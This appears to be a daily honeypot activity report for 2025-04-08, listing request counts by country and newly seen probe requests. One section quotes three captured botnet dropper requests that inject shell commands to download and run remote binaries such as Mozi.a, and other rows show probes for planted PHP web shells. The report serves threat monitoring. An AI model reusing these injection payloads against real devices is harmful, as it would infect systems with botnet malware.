Skip to main content
  1. Daily-Posts/

Report: 2025-04-08

·439 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-04-08
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 3 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 29 new requests that have never been observed before (these were added to the monitored request database.).

A total of 2224 requests were recorded during the day, originating from 3 different countries, with a peak of 411 requests coming from NL.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
FRGermany
DEGermany
PTAustralia
USDubai
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
31.170.22.205GET /cgi-bin/live_api.cgi?page=satellite_list&id=&ip=$(cd+/tmp;wget+http://31.170.22.205/dl18;busybox+wget+http://31.170.22.205/dl18;sh+dl18) HTTP/1.1
5.183.209.244POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F103.15.28.149%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1
27.43.206.225GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
324GET /FormLogin HTTP/1.1
972GET /ws HTTP/1.1
2071\x00\x0E8\x13
2281GET /Odin/http/call1744080873 HTTP/1.1
2321GET //filefuns.php HTTP/1.1
2331GET //termps.php HTTP/1.1
2341GET //wp-content/termps.php HTTP/1.1
2351GET //wp-content/hplfuns.php HTTP/1.1
2361GET //userfuns.php HTTP/1.1
2371GET //classfuns.php HTTP/1.1
2381GET //thoms.php HTTP/1.1
2391GET //tempfuns.php HTTP/1.1
2401GET //wp-content/siteheads.php HTTP/1.1
2491GET //siteheads.php HTTP/1.1
2501GET //adminfuns.php HTTP/1.1
2581GET //hplfuns.php HTTP/1.1
2591GET //connects.php HTTP/1.1
2601GET //inputs.php HTTP/1.1
2721GET /Images/password_in.gif HTTP/1.1
2731GET /Images/password_out.gif HTTP/1.1
2741GET /Images/recipe_in.gif HTTP/1.1
2751GET /Images/recipe_out.gif HTTP/1.1
3631\x00\x0E8\xBA\x17\xD5\x7Ft\x97\x9F\x1E\x00\x00\x00\x00\x00
4011GET /OdinHttpCall1744080873 HTTP/1.1
4031GET /odinhttpcall1744080873 HTTP/1.1
4041\x00\x0E8\xEC\xE9\xBF\x1D\xF4/\x99\xBB\x00\x00\x00\x00\x00
4101\x00\x0E8\x9E\xB5#\xCF#yp\xF0\x00\x00\x00\x00\x00
4441\x04\x01\x01\xBB@\xE9\xA4hadm:12345\x00
4451\x04\x01\x01\xBB@\xE9\xA4j\x00

country_iso_code
#

number_of_occurencecountry_iso_code
0411NL
1335GB
2334FR
3223SC
4193DE
5184US
680PL
765CN
864HK
959BG
1045KZ
1138PT
1231CH
1316TR
1416CA
1514NG
1612KR
1710LV
189UA
199AO
209IT
217GH
227LT
236BE
246ZA
255IN
265BR
275SG
284JP
293VN
303IL
312DO
322MC
332TW
341PA
351HU
361ES
371IR
381RU
391ID
401AZ
411GE
421RS
431AE

Related

Report: 2025-04-07
·1203 words
Repport Daily
Report: 2025-04-06
·510 words
Repport Daily
Report: 2025-04-05
·622 words
Repport Daily